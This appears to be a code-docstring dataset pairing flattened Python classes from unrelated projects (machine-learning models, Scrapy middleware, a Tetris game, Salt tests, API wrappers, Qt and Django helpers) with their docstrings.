Producer: enters a waiting state when the warehouse stock reaches 50.
6259906832920d7e50bc77ea
class AttentionReverse(Attention3): <NEW_LINE> <INDENT> def __init__(self, name, tokenizer, optimizer): <NEW_LINE> <INDENT> Attention3.__init__(self, name, tokenizer, optimizer, reverse_order=True) <NEW_LINE> <DEDENT> def decode_sequence(self, input_seq): <NEW_LINE> <INDENT> reversed_seq = numpy.flip(input_seq, 1) <NEW_LINE> print(input_seq) <NEW_LINE> print(reversed_seq) <NEW_LINE> Attention3.decode_sequence(self, reversed_seq)
Same as Attention3 except the source sequence is reversed during training, and the input sentence tokens also need to be reversed at runtime. This has been shown to ease training and give significantly higher accuracy (Sutskever, 2014).
62599068462c4b4f79dbd1ab
class RandomAgentMiddleware(object): <NEW_LINE> <INDENT> def __init__(self,crawler): <NEW_LINE> <INDENT> super(RandomAgentMiddleware,self).__init__() <NEW_LINE> self.useAgent = UserAgent() <NEW_LINE> self.useAgent_type = crawler.settings.get("RANDOM_UA_TYPE","random") <NEW_LINE> <DEDENT> def process_request(self, request, spider): <NEW_LINE> <INDENT> def get_useAgent(): <NEW_LINE> <INDENT> return getattr(self.useAgent,self.useAgent_type) <NEW_LINE> <DEDENT> request.headers.setdefault('User-Agent',get_useAgent()) <NEW_LINE> request.meta["proxy"] = "" <NEW_LINE> return None <NEW_LINE> <DEDENT> @classmethod <NEW_LINE> def from_crawler(cls, crawler): <NEW_LINE> <INDENT> s = cls(crawler) <NEW_LINE> return s
Generates a random User-Agent header.
62599068baa26c4b54d50a4a
class Game(): <NEW_LINE> <INDENT> def __init__(self): <NEW_LINE> <INDENT> self._playfield = Playfield() <NEW_LINE> self.rows = self._playfield.rows <NEW_LINE> self.columns = self._playfield.columns <NEW_LINE> <DEDENT> def hard_drop(self): <NEW_LINE> <INDENT> logging.debug("Game: Did hard drop") <NEW_LINE> <DEDENT> def rotate_acw(self): <NEW_LINE> <INDENT> logging.debug("Game: Did anti-clockwise rotation") <NEW_LINE> <DEDENT> def rotate_cw(self): <NEW_LINE> <INDENT> logging.debug("Game: Did clockwise rotation") <NEW_LINE> <DEDENT> def shift_left(self): <NEW_LINE> <INDENT> logging.debug("Game: Did shift left") <NEW_LINE> <DEDENT> def shift_right(self): <NEW_LINE> <INDENT> logging.debug("Game: Did shift right") <NEW_LINE> <DEDENT> def update(self): <NEW_LINE> <INDENT> logging.debug("Game: Nothing to update :D") <NEW_LINE> <DEDENT> def get_cell_state(self, row, column): <NEW_LINE> <INDENT> return self._playfield.get_cell_state(row, column)
The class coordinates all actions in Clontris.
625990689c8ee82313040d5a
class ExtraMinionDataInPillarTestCase(TestCase, LoaderModuleMockMixin): <NEW_LINE> <INDENT> def setup_loader_modules(self): <NEW_LINE> <INDENT> return {extra_minion_data_in_pillar: {"__virtual__": True}} <NEW_LINE> <DEDENT> def setUp(self): <NEW_LINE> <INDENT> self.pillar = MagicMock() <NEW_LINE> self.extra_minion_data = { "key1": {"subkey1": "value1"}, "key2": {"subkey2": {"subsubkey2": "value2"}}, "key3": "value3", "key4": {"subkey4": "value4"}, } <NEW_LINE> <DEDENT> def test_extra_values_none_or_empty(self): <NEW_LINE> <INDENT> ret = extra_minion_data_in_pillar.ext_pillar( "fake_id", self.pillar, "fake_include", None ) <NEW_LINE> self.assertEqual(ret, {}) <NEW_LINE> ret = extra_minion_data_in_pillar.ext_pillar( "fake_id", self.pillar, "fake_include", {} ) <NEW_LINE> self.assertEqual(ret, {}) <NEW_LINE> <DEDENT> def test_include_all(self): <NEW_LINE> <INDENT> for include_all in ["*", "<all>"]: <NEW_LINE> <INDENT> ret = extra_minion_data_in_pillar.ext_pillar( "fake_id", self.pillar, include_all, self.extra_minion_data ) <NEW_LINE> self.assertEqual(ret, self.extra_minion_data) <NEW_LINE> <DEDENT> <DEDENT> def test_include_specific_keys(self): <NEW_LINE> <INDENT> ret = extra_minion_data_in_pillar.ext_pillar( "fake_id", self.pillar, include=["key1:subkey1", "key2:subkey3", "key3", "key4"], extra_minion_data=self.extra_minion_data, ) <NEW_LINE> self.assertEqual( ret, { "key1": {"subkey1": "value1"}, "key3": "value3", "key4": {"subkey4": "value4"}, }, )
Test cases for salt.pillar.extra_minion_data_in_pillar
625990688da39b475be0498f
class PrivateTimeFramedManager(TimeFramedManager): <NEW_LINE> <INDENT> def get_queryset(self, subscription): <NEW_LINE> <INDENT> queryset = super(PrivateTimeFramedManager, self).get_queryset() <NEW_LINE> return queryset.filter(subscription=subscription)
Model manager used by PrivateTimeFramedMixin models
62599068796e427e5384ff1b
class Wallpaper(object): <NEW_LINE> <INDENT> def __init__(self, width=1600, height=900, filename='wallpaper.png'): <NEW_LINE> <INDENT> self.width = width <NEW_LINE> self.height = height <NEW_LINE> self.filename = filename <NEW_LINE> <DEDENT> def paint_pattern(self): <NEW_LINE> <INDENT> pass <NEW_LINE> <DEDENT> def paint(self): <NEW_LINE> <INDENT> self.image = Image.new(mode='RGB', size=(self.width, self.height), color=(47, 98, 135)) <NEW_LINE> self.paint_pattern() <NEW_LINE> self.image.save(fp=self.filename)
Base class for all wallpapers. Creates a (very) simple single-color wallpaper.

Parameters
----------
width: int
height: int
filename: str

Attributes
----------
width: int
height: int
filename: str
image: PIL Image
    The image which holds the wallpaper.
62599068442bda511e95d92b
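A hypothetical subclass sketch showing the paint_pattern() hook that Wallpaper is designed around, assuming Pillow is installed:

    from PIL import ImageDraw

    class StripedWallpaper(Wallpaper):
        def paint_pattern(self):
            draw = ImageDraw.Draw(self.image)
            for x in range(0, self.width, 80):                 # a stripe every 80 px
                draw.rectangle([x, 0, x + 40, self.height], fill=(30, 60, 90))

    StripedWallpaper(width=800, height=600, filename='striped.png').paint()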
class Gist(sgqlc.types.Type, Node, Starrable, UniformResourceLocatable): <NEW_LINE> <INDENT> __schema__ = github_schema <NEW_LINE> __field_names__ = ('comments', 'created_at', 'description', 'files', 'forks', 'is_fork', 'is_public', 'name', 'owner', 'pushed_at', 'updated_at') <NEW_LINE> comments = sgqlc.types.Field(sgqlc.types.non_null(GistCommentConnection), graphql_name='comments', args=sgqlc.types.ArgDict(( ('after', sgqlc.types.Arg(String, graphql_name='after', default=None)), ('before', sgqlc.types.Arg(String, graphql_name='before', default=None)), ('first', sgqlc.types.Arg(Int, graphql_name='first', default=None)), ('last', sgqlc.types.Arg(Int, graphql_name='last', default=None)), )) ) <NEW_LINE> created_at = sgqlc.types.Field(sgqlc.types.non_null(DateTime), graphql_name='createdAt') <NEW_LINE> description = sgqlc.types.Field(String, graphql_name='description') <NEW_LINE> files = sgqlc.types.Field(sgqlc.types.list_of(GistFile), graphql_name='files', args=sgqlc.types.ArgDict(( ('limit', sgqlc.types.Arg(Int, graphql_name='limit', default=10)), ('oid', sgqlc.types.Arg(GitObjectID, graphql_name='oid', default=None)), )) ) <NEW_LINE> forks = sgqlc.types.Field(sgqlc.types.non_null(GistConnection), graphql_name='forks', args=sgqlc.types.ArgDict(( ('after', sgqlc.types.Arg(String, graphql_name='after', default=None)), ('before', sgqlc.types.Arg(String, graphql_name='before', default=None)), ('first', sgqlc.types.Arg(Int, graphql_name='first', default=None)), ('last', sgqlc.types.Arg(Int, graphql_name='last', default=None)), ('order_by', sgqlc.types.Arg(GistOrder, graphql_name='orderBy', default=None)), )) ) <NEW_LINE> is_fork = sgqlc.types.Field(sgqlc.types.non_null(Boolean), graphql_name='isFork') <NEW_LINE> is_public = sgqlc.types.Field(sgqlc.types.non_null(Boolean), graphql_name='isPublic') <NEW_LINE> name = sgqlc.types.Field(sgqlc.types.non_null(String), graphql_name='name') <NEW_LINE> owner = sgqlc.types.Field(RepositoryOwner, graphql_name='owner') <NEW_LINE> pushed_at = sgqlc.types.Field(DateTime, graphql_name='pushedAt') <NEW_LINE> updated_at = sgqlc.types.Field(sgqlc.types.non_null(DateTime), graphql_name='updatedAt')
A Gist.
625990684f88993c371f10f1
class ModelTests(StockManagementAPITestCase): <NEW_LINE> <INDENT> @classmethod <NEW_LINE> def setUpTestData(cls): <NEW_LINE> <INDENT> cls.test_user = UserFactory(username="test_user_1") <NEW_LINE> cls.currency = CurrencyFactory(code="USD", name="United States Dollar") <NEW_LINE> cls.measurement_type = MeasurementTypeFactory() <NEW_LINE> cls.supplier = SupplierFactory( name="Tesla", phone="15051111111", email="[email protected]", address="San Francisco, California, USA", ) <NEW_LINE> cls.material = MaterialFactory( name="Tesla Model 3", total_amount=1.00, accountant=cls.test_user, measurement_value=1650.00, price=50000.00, currency=cls.currency, measurement_type=cls.measurement_type, supplier=cls.supplier, ) <NEW_LINE> <DEDENT> def test_if_material_is_created(self): <NEW_LINE> <INDENT> assert self.material.name == "Tesla Model 3" <NEW_LINE> assert self.material.total_amount == 1.00 <NEW_LINE> assert self.material.measurement_value == 1650.00 <NEW_LINE> assert self.material.price == 50000.00 <NEW_LINE> assert self.material.accountant.username == "test_user_1" <NEW_LINE> <DEDENT> def test_if_currency_is_created(self): <NEW_LINE> <INDENT> assert self.currency.code == "USD" <NEW_LINE> assert self.currency.name == "United States Dollar" <NEW_LINE> <DEDENT> def test_if_measurement_type_is_created(self): <NEW_LINE> <INDENT> assert self.measurement_type.code == "KG" <NEW_LINE> assert self.measurement_type.name == "Kilogram" <NEW_LINE> <DEDENT> def test_if_supplier_is_created_(self): <NEW_LINE> <INDENT> assert self.supplier.name == "Tesla" <NEW_LINE> assert self.supplier.phone == "15051111111" <NEW_LINE> assert self.supplier.email == "[email protected]" <NEW_LINE> assert self.supplier.address == "San Francisco, California, USA"
Creates mock models and checks if they are created successfully.
62599068fff4ab517ebcefc0
class _ThreadedBulkSimulation(): <NEW_LINE> <INDENT> def __init__(self, pool: AbstractPool) -> None: <NEW_LINE> <INDENT> self.pool = pool.clone() <NEW_LINE> self.simulators = set() <NEW_LINE> self.per_thread = 3000 <NEW_LINE> self.processes = [] <NEW_LINE> self.is_constant_pool = isinstance(self.pool, ConstantPool) <NEW_LINE> <DEDENT> def run(self, amount : int): <NEW_LINE> <INDENT> if amount < self.per_thread: <NEW_LINE> <INDENT> bulksim = BulkSimulation(self.pool.clone()) <NEW_LINE> bulksim.run(amount) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> manager = multiprocessing.Manager() <NEW_LINE> data = manager.list() <NEW_LINE> if not self.is_constant_pool: <NEW_LINE> <INDENT> data.append(0) <NEW_LINE> data.append(0) <NEW_LINE> data.append(0) <NEW_LINE> data.append(manager.dict()) <NEW_LINE> for i in self.pool.weights(): <NEW_LINE> <INDENT> data[3][i] = { "failures" : 0, "successes" : 0, "total" : 0 } <NEW_LINE> <DEDENT> <DEDENT> thread_count = amount//self.per_thread <NEW_LINE> for i in range(thread_count): <NEW_LINE> <INDENT> tmp = self.pool.clone() <NEW_LINE> bulksim = BulkSimulation(tmp) <NEW_LINE> self.simulators.add(bulksim) <NEW_LINE> tmp = multiprocessing.Process(target=bulksim.run, args=(self.per_thread, data,)) <NEW_LINE> self.processes.append(tmp) <NEW_LINE> tmp.start() <NEW_LINE> <DEDENT> if 0 < amount%self.per_thread: <NEW_LINE> <INDENT> bulksim = BulkSimulation(self.pool.clone()) <NEW_LINE> bulksim.run(amount%self.per_thread, data) <NEW_LINE> <DEDENT> for i in self.processes: <NEW_LINE> <INDENT> i.join() <NEW_LINE> <DEDENT> success = data[0] <NEW_LINE> failures = data[1] <NEW_LINE> total = data[2] <NEW_LINE> specific = data[3] <NEW_LINE> print(f"\nTotal: {total}") <NEW_LINE> print(f"Success: {success}", f"Failures: {failures}") <NEW_LINE> print(f"Rate: {(success/total)*100}%")
Same as BulkSimulation, but uses multiprocessing to really speed it up; much faster at higher counts. Probably won't be used in any bot command, as it is also very heavy.
625990688e7ae83300eea833
class QueryBackSourceRulesRequest(JDCloudRequest): <NEW_LINE> <INDENT> def __init__(self, parameters, header=None, version="v1"): <NEW_LINE> <INDENT> super(QueryBackSourceRulesRequest, self).__init__( '/domain/{domain}/queryBackSourceRules', 'GET', header, version) <NEW_LINE> self.parameters = parameters
Queries the batch configuration of back-to-origin rewrite rules.
62599068f7d966606f74948d
class NewFiatBankDeposit(object): <NEW_LINE> <INDENT> def __init__(self, amount=None, message=None, bank=None, dep_type=None): <NEW_LINE> <INDENT> self.swagger_types = { 'amount': 'int', 'message': 'str', 'bank': 'str', 'dep_type': 'str' } <NEW_LINE> self.attribute_map = { 'amount': 'amount', 'message': 'message', 'bank': 'bank', 'dep_type': 'depType' } <NEW_LINE> self._amount = amount <NEW_LINE> self._message = message <NEW_LINE> self._bank = bank <NEW_LINE> self._dep_type = dep_type <NEW_LINE> <DEDENT> @property <NEW_LINE> def amount(self): <NEW_LINE> <INDENT> return self._amount <NEW_LINE> <DEDENT> @amount.setter <NEW_LINE> def amount(self, amount): <NEW_LINE> <INDENT> if amount is None: <NEW_LINE> <INDENT> raise ValueError("Invalid value for `amount`, must not be `None`") <NEW_LINE> <DEDENT> self._amount = amount <NEW_LINE> <DEDENT> @property <NEW_LINE> def message(self): <NEW_LINE> <INDENT> return self._message <NEW_LINE> <DEDENT> @message.setter <NEW_LINE> def message(self, message): <NEW_LINE> <INDENT> if message is None: <NEW_LINE> <INDENT> raise ValueError("Invalid value for `message`, must not be `None`") <NEW_LINE> <DEDENT> self._message = message <NEW_LINE> <DEDENT> @property <NEW_LINE> def bank(self): <NEW_LINE> <INDENT> return self._bank <NEW_LINE> <DEDENT> @bank.setter <NEW_LINE> def bank(self, bank): <NEW_LINE> <INDENT> if bank is None: <NEW_LINE> <INDENT> raise ValueError("Invalid value for `bank`, must not be `None`") <NEW_LINE> <DEDENT> self._bank = bank <NEW_LINE> <DEDENT> @property <NEW_LINE> def dep_type(self): <NEW_LINE> <INDENT> return self._dep_type <NEW_LINE> <DEDENT> @dep_type.setter <NEW_LINE> def dep_type(self, dep_type): <NEW_LINE> <INDENT> if dep_type is None: <NEW_LINE> <INDENT> raise ValueError("Invalid value for `dep_type`, must not be `None`") <NEW_LINE> <DEDENT> self._dep_type = dep_type <NEW_LINE> <DEDENT> def to_dict(self): <NEW_LINE> <INDENT> result = {} <NEW_LINE> for attr, _ in iteritems(self.swagger_types): <NEW_LINE> <INDENT> value = getattr(self, attr) <NEW_LINE> if isinstance(value, list): <NEW_LINE> <INDENT> result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) <NEW_LINE> <DEDENT> elif hasattr(value, "to_dict"): <NEW_LINE> <INDENT> result[attr] = value.to_dict() <NEW_LINE> <DEDENT> elif isinstance(value, dict): <NEW_LINE> <INDENT> result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> result[attr] = value <NEW_LINE> <DEDENT> <DEDENT> return result <NEW_LINE> <DEDENT> def to_str(self): <NEW_LINE> <INDENT> return pformat(self.to_dict()) <NEW_LINE> <DEDENT> def __repr__(self): <NEW_LINE> <INDENT> return self.to_str() <NEW_LINE> <DEDENT> def __eq__(self, other): <NEW_LINE> <INDENT> return self.__dict__ == other.__dict__ <NEW_LINE> <DEDENT> def __ne__(self, other): <NEW_LINE> <INDENT> return not self == other
NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually.
625990684e4d562566373bac
class StorageFlexUtilHealth(ManagedObject): <NEW_LINE> <INDENT> consts = StorageFlexUtilHealthConsts() <NEW_LINE> naming_props = set([]) <NEW_LINE> mo_meta = { "classic": MoMeta("StorageFlexUtilHealth", "storageFlexUtilHealth", "health", VersionMeta.Version304a, "OutputOnly", 0xf, [], ["admin", "read-only", "user"], ['storageFlexUtilController'], [], ["Get"]), } <NEW_LINE> prop_meta = { "classic": { "child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version304a, MoPropertyMeta.INTERNAL, None, None, None, None, [], []), "dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version304a, MoPropertyMeta.READ_ONLY, 0x2, 0, 255, None, [], []), "health": MoPropertyMeta("health", "health", "string", VersionMeta.Version304a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []), "rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version304a, MoPropertyMeta.READ_ONLY, 0x4, 0, 255, None, [], []), "status": MoPropertyMeta("status", "status", "string", VersionMeta.Version304a, MoPropertyMeta.READ_ONLY, 0x8, None, None, None, ["", "created", "deleted", "modified", "removed"], []), }, } <NEW_LINE> prop_map = { "classic": { "childAction": "child_action", "dn": "dn", "health": "health", "rn": "rn", "status": "status", }, } <NEW_LINE> def __init__(self, parent_mo_or_dn, **kwargs): <NEW_LINE> <INDENT> self._dirty_mask = 0 <NEW_LINE> self.child_action = None <NEW_LINE> self.health = None <NEW_LINE> self.status = None <NEW_LINE> ManagedObject.__init__(self, "StorageFlexUtilHealth", parent_mo_or_dn, **kwargs)
This is StorageFlexUtilHealth class.
62599068d486a94d0ba2d764
class Twitter: <NEW_LINE> <INDENT> def __init__(self) -> None: <NEW_LINE> <INDENT> auth = tweepy.OAuthHandler(os.environ["API_KEY"], os.environ["API_SECRET"]) <NEW_LINE> auth.set_access_token(os.environ["ACCESS_TOKEN"], os.environ["ACCESS_TOKEN_SECRET"]) <NEW_LINE> self.api = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True) <NEW_LINE> <DEDENT> @staticmethod <NEW_LINE> def _compose(constituency: Constituency) -> dict: <NEW_LINE> <INDENT> if constituency.dc_winner == Faction.nonpartisan: <NEW_LINE> <INDENT> affiliation = "non-partisan" <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> affiliation = f"pro-{constituency.dc_winner.name}" <NEW_LINE> <DEDENT> text = f"{constituency.electoral_code}: " f"{constituency.caption.en}, {constituency.caption.zh}.\n" f"Voted {affiliation} in the 2019 District Council elections." <NEW_LINE> return {"status": text, "lat": constituency.geo.lat, "long": constituency.geo.long} <NEW_LINE> <DEDENT> def update(self, constituency: Constituency, dry_run: bool = False) -> tweepy.Status: <NEW_LINE> <INDENT> composition = self._compose(constituency) <NEW_LINE> LOG.info("Selecting %s, %s, %s", constituency.electoral_code, constituency.caption.en, constituency.caption.zh) <NEW_LINE> if dry_run: <NEW_LINE> <INDENT> return tweepy.Status <NEW_LINE> <DEDENT> media = self.api.media_upload(filename=constituency.file) <NEW_LINE> self.api.create_media_metadata(media.media_id, constituency.caption.en) <NEW_LINE> return self.api.update_status(**composition, media_ids=[media.media_id])
Wrapper for the Twitter API
62599068ac7a0e7691f73c8b
class GaussianPrior(object): <NEW_LINE> <INDENT> def __init__(self, m, sigma): <NEW_LINE> <INDENT> self.m = m <NEW_LINE> self.sigma = sigma <NEW_LINE> <DEDENT> def __call__(self, cube): <NEW_LINE> <INDENT> return stats.norm.ppf(cube,scale=self.sigma,loc=self.m) <NEW_LINE> <DEDENT> def __repr__(self): <NEW_LINE> <INDENT> return "gaussian prior - mean {0} std {1}".format(self.m, self.sigma)
A gaussian prior

Parameters
----------
m: ~float
    mean of the distribution
sigma: ~float
    sigma of the distribution
625990687c178a314d78e7be
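A sketch of how such a prior is typically used in nested-sampling codes: it maps unit-cube samples to the physical parameter via the inverse CDF (assumes numpy and scipy.stats as in the class above):

    import numpy as np

    prior = GaussianPrior(m=10.0, sigma=2.0)
    u = np.random.uniform(size=5)   # samples from the unit hypercube
    theta = prior(u)                # inverse-CDF transform: draws from N(10, 2)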
class EventDestination(AWSProperty): <NEW_LINE> <INDENT> props: PropsDictType = { "CloudWatchDestination": (CloudWatchDestination, False), "Enabled": (boolean, False), "KinesisFirehoseDestination": (KinesisFirehoseDestination, False), "MatchingEventTypes": ([str], True), "Name": (str, False), }
`EventDestination <http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-ses-configurationseteventdestination-eventdestination.html>`__
625990682ae34c7f260ac88d
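An illustrative sketch of building this troposphere property on its own and rendering it; only the property names listed in the record above are used, and the event-type strings are examples:

    from troposphere.ses import EventDestination

    dest = EventDestination(
        Name="my-destination",
        Enabled=True,
        MatchingEventTypes=["send", "bounce", "complaint"],   # example event types
    )
    print(dest.to_dict())   # CloudFormation-shaped dict for the property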
class SASqc: <NEW_LINE> <INDENT> def __init__(self, session, *args, **kwargs): <NEW_LINE> <INDENT> self.sasproduct = "qc" <NEW_LINE> self.logger = logging.getLogger(__name__) <NEW_LINE> self.logger.setLevel(logging.WARN) <NEW_LINE> self.sas = session <NEW_LINE> logging.debug("Initialization of SAS Macro: " + self.sas.saslog()) <NEW_LINE> <DEDENT> def cusum(self, **kwargs: dict) -> 'SASresults': <NEW_LINE> <INDENT> required_set = {} <NEW_LINE> legal_set = {'by', 'xchart', 'procopts'} <NEW_LINE> logger.debug("kwargs type: " + str(type(kwargs))) <NEW_LINE> return SASProcCommons._run_proc(self, "CUSUM", required_set, legal_set, **kwargs) <NEW_LINE> <DEDENT> def macontrol(self, **kwargs: dict) -> 'SASresults': <NEW_LINE> <INDENT> required_set = {} <NEW_LINE> legal_set = {'procopts'} <NEW_LINE> logger.debug("kwargs type: " + str(type(kwargs))) <NEW_LINE> return SASProcCommons._run_proc(self, "MACONTROL", required_set, legal_set, **kwargs) <NEW_LINE> <DEDENT> def capability(self, **kwargs: dict) -> 'SASresults': <NEW_LINE> <INDENT> required_set = {} <NEW_LINE> legal_set = {'cdfplot', 'comphist', 'histogram', 'inset', 'intervals', 'output', 'ppplot', 'probplot', 'qqplot', 'freq', 'weight', 'id', 'by', 'spec', 'out', 'procopts'} <NEW_LINE> logger.debug("kwargs type: " + str(type(kwargs))) <NEW_LINE> return SASProcCommons._run_proc(self, "CAPABILITY", required_set, legal_set, **kwargs) <NEW_LINE> <DEDENT> def shewhart(self, **kwargs: dict) -> 'SASresults': <NEW_LINE> <INDENT> required_set = {} <NEW_LINE> legal_set = {'procopts'} <NEW_LINE> logger.debug("kwargs type: " + str(type(kwargs))) <NEW_LINE> return SASProcCommons._run_proc(self, "SHEWHART", required_set, legal_set, **kwargs)
This class is for SAS/QC procedures to be called as python3 objects and use SAS as the computational engine.

This class and all the useful work in this package require a licensed version of SAS.

To add a new procedure do the following:

#. Create a new method for the procedure
#. Create the set of required statements. If there are no required statements then create an empty set {}
#. Create the legal set of statements. This can often be obtained from the documentation of the procedure. 'procopts' should always be included in the legal set to allow flexibility in calling the procedure.
#. Create the doc string with the following parts at a minimum:
   - Procedure Name
   - Required set
   - Legal set
   - Link to the procedure documentation
#. Add the return call for the method using an existing procedure as an example
#. Verify that all the statements in the required and legal sets are listed in _makeProcCallMacro method of sasproccommons.py
#. Write at least one test to exercise the procedures and include it in the appropriate testing file
6259906867a9b606de547674
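A sketch of adding a new procedure method to SASqc following the steps in the docstring above; PARETO is used as the example and its legal statement set here is illustrative, not taken from the SAS documentation:

    # Added inside the SASqc class, alongside cusum/macontrol/capability/shewhart.
    def pareto(self, **kwargs: dict) -> 'SASresults':
        """
        Python method to call the PARETO procedure (illustrative sketch).

        required_set = {}
        legal_set = {'by', 'freq', 'weight', 'procopts'}

        Documentation: see the SAS/QC documentation for the PARETO procedure.
        """
        required_set = {}
        legal_set = {'by', 'freq', 'weight', 'procopts'}
        logger.debug("kwargs type: " + str(type(kwargs)))
        return SASProcCommons._run_proc(self, "PARETO", required_set, legal_set, **kwargs)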
class BinOr: <NEW_LINE> <INDENT> a_ = True <NEW_LINE> b_ = True <NEW_LINE> def __init__(self, a, b): <NEW_LINE> <INDENT> self.a_ = a <NEW_LINE> self.b_ = b <NEW_LINE> <DEDENT> def evaluate(self): <NEW_LINE> <INDENT> return self.a_.evaluate() or self.b_.evaluate()
Binary OR operation. Returns TRUE if at least one input is TRUE.
62599068e1aae11d1e7cf3df
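A tiny usage sketch; Const is a hypothetical leaf node providing the evaluate() interface BinOr expects from its operands:

    class Const:
        def __init__(self, value):
            self.value = value

        def evaluate(self):
            return self.value

    expr = BinOr(Const(False), Const(True))
    print(expr.evaluate())   # True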
class DictTableModel(QtCore.QAbstractTableModel): <NEW_LINE> <INDENT> def __init__(self): <NEW_LINE> <INDENT> super().__init__() <NEW_LINE> self.lock = Mutex() <NEW_LINE> self.headers = ['Name'] <NEW_LINE> self.storage = OrderedDict() <NEW_LINE> <DEDENT> def getKeyByNumber(self, n): <NEW_LINE> <INDENT> i = 0 <NEW_LINE> if not(0 <= n < len(self.storage)): <NEW_LINE> <INDENT> raise IndexError <NEW_LINE> <DEDENT> it = iter(self.storage) <NEW_LINE> key = next(it) <NEW_LINE> while(i<n): <NEW_LINE> <INDENT> key = next(it) <NEW_LINE> i += 1 <NEW_LINE> <DEDENT> return key <NEW_LINE> <DEDENT> def getNumberByKey(self, key): <NEW_LINE> <INDENT> i = 0 <NEW_LINE> it = iter(self.storage) <NEW_LINE> newkey = next(it) <NEW_LINE> while(key != newkey): <NEW_LINE> <INDENT> newkey = next(it) <NEW_LINE> i += 1 <NEW_LINE> <DEDENT> return i <NEW_LINE> <DEDENT> def rowCount(self, parent = QtCore.QModelIndex()): <NEW_LINE> <INDENT> return len(self.storage) <NEW_LINE> <DEDENT> def columnCount(self, parent = QtCore.QModelIndex()): <NEW_LINE> <INDENT> return len(self.headers) <NEW_LINE> <DEDENT> def flags(self, index): <NEW_LINE> <INDENT> return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable <NEW_LINE> <DEDENT> def data(self, index, role): <NEW_LINE> <INDENT> if not index.isValid(): <NEW_LINE> <INDENT> return None <NEW_LINE> <DEDENT> elif role == QtCore.Qt.DisplayRole: <NEW_LINE> <INDENT> key = self.getKeyByNumber(index.row()) <NEW_LINE> if index.column() == 0: <NEW_LINE> <INDENT> return key <NEW_LINE> <DEDENT> elif index.column() == 1: <NEW_LINE> <INDENT> return self.storage[key] <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> return None <NEW_LINE> <DEDENT> <DEDENT> else: <NEW_LINE> <INDENT> return None <NEW_LINE> <DEDENT> <DEDENT> def headerData(self, section, orientation, role = QtCore.Qt.DisplayRole): <NEW_LINE> <INDENT> if not(0 <= section < len(self.headers)): <NEW_LINE> <INDENT> return None <NEW_LINE> <DEDENT> elif role != QtCore.Qt.DisplayRole: <NEW_LINE> <INDENT> return None <NEW_LINE> <DEDENT> elif orientation != QtCore.Qt.Horizontal: <NEW_LINE> <INDENT> return None <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> return self.headers[section] <NEW_LINE> <DEDENT> <DEDENT> def add(self, key, data): <NEW_LINE> <INDENT> with self.lock: <NEW_LINE> <INDENT> if key in self.storage: <NEW_LINE> <INDENT> return None <NEW_LINE> <DEDENT> row = len(self.storage) <NEW_LINE> self.beginInsertRows(QtCore.QModelIndex(), row, row) <NEW_LINE> self.storage[key] = data <NEW_LINE> self.endInsertRows() <NEW_LINE> return key <NEW_LINE> <DEDENT> <DEDENT> def pop(self, key): <NEW_LINE> <INDENT> with self.lock: <NEW_LINE> <INDENT> if key in self.storage: <NEW_LINE> <INDENT> row = self.getNumberByKey(key) <NEW_LINE> self.beginRemoveRows(QtCore.QModelIndex(), row, row) <NEW_LINE> ret = self.storage.pop(key) <NEW_LINE> self.endRemoveRows() <NEW_LINE> return ret
Qt model storing a table in dictionaries
625990687d847024c075db7f
class ServerThread(threading.Thread): <NEW_LINE> <INDENT> def __init__(self, dir, file): <NEW_LINE> <INDENT> self.dir = dir <NEW_LINE> self.file = file <NEW_LINE> super().__init__(name=f'server-{file}') <NEW_LINE> <DEDENT> def run(self): <NEW_LINE> <INDENT> print(f'Running server {self.file} in {self.dir}') <NEW_LINE> try: <NEW_LINE> <INDENT> subprocess.run(f'start "Server" /D "{self.dir}" /MIN /HIGH "{self.file}"', shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) <NEW_LINE> <DEDENT> except Exception as ex: <NEW_LINE> <INDENT> print(f'Error running {self.file}:\n\n') <NEW_LINE> traceback.print_exc()
A thread to run a server. This is a simple thread implementation, which will run a server start file in another thread, so it doesn't block the current thread.
625990687047854f46340b5a
class WebUiBaseMind(object): <NEW_LINE> <INDENT> def __init__(self, request, cred): <NEW_LINE> <INDENT> self.request = request <NEW_LINE> self.credentials = cred <NEW_LINE> <DEDENT> def isLocal(self): <NEW_LINE> <INDENT> if self.request.getClientIP() == '127.0.0.1': <NEW_LINE> <INDENT> return True <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> return False
Base class for the 'mind' object, representing the authenticated user.
62599068dd821e528d6da554
class TokenConsumerBackend(object): <NEW_LINE> <INDENT> def authenticate(self, username=None, password=None): <NEW_LINE> <INDENT> endpoints = token_settings.AUTH_ENDPOINTS <NEW_LINE> base = token_settings.API_BASE_URL <NEW_LINE> response = requests.post(base+endpoints['LOGIN'], data={ 'username': username, 'password': password }) <NEW_LINE> if response.status_code == 200: <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> user = User.objects.get(username=username) <NEW_LINE> <DEDENT> except User.DoesNotExist: <NEW_LINE> <INDENT> user = User(username=username, password="Password Not Stored") <NEW_LINE> user.save() <NEW_LINE> <DEDENT> data = response.json() <NEW_LINE> try: <NEW_LINE> <INDENT> user.token.key = data['key'] <NEW_LINE> <DEDENT> except Token.DoesNotExist: <NEW_LINE> <INDENT> token = Token(key=data['key'], user=user) <NEW_LINE> token.save() <NEW_LINE> <DEDENT> return user <NEW_LINE> <DEDENT> return None <NEW_LINE> <DEDENT> def get_user(self, user_id): <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> return User.objects.get(pk=user_id) <NEW_LINE> <DEDENT> except User.DoesNotExist: <NEW_LINE> <INDENT> return None
Use an external token-based login system for Django authentication. Will maintain the login locally and with the remote server, and decorate the API calls with the appropriate header.
625990684e4d562566373bad
